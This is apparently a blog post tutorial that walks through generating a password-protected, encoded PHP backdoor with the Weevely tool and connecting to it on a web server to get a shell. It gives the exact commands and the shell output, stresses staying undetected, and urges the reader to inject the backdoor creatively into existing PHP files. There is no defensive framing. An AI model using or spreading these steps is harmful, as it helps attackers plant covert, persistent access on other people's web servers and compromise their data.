Silent Backdoor with Weevely

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5):

root@bt:~# >cd /pentest/backdoors/web/weevely
root@bt:/pentest/backdoors/web/weevely#./main.py -g -p bD_p4ss -o bd.php

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'bd.php' created with password 'bD_p4ss'.
root@bt:/pentest/backdoors/web/weevely#

Where:
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

Now you have a new “encrypted” php file called bd.php. So how does it work?
You can put this script on the webserver document root.

Now take a look what will it be when i put the script and accessed it.

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[www-data@gw /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@gw /var/www] pwd
/var/www
[www-data@gw /var/www]

Voila! we’ve got a non-interactive shell!
Weevely can also be easily deployed inside any php file, but you should pay attention on where this script will be injected, be creative 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Thomas Gregory

Jai Guru Deva. What the eyes see and the ears hear, the mind believes. Gamer. Free thinker. Pwning @Spentera !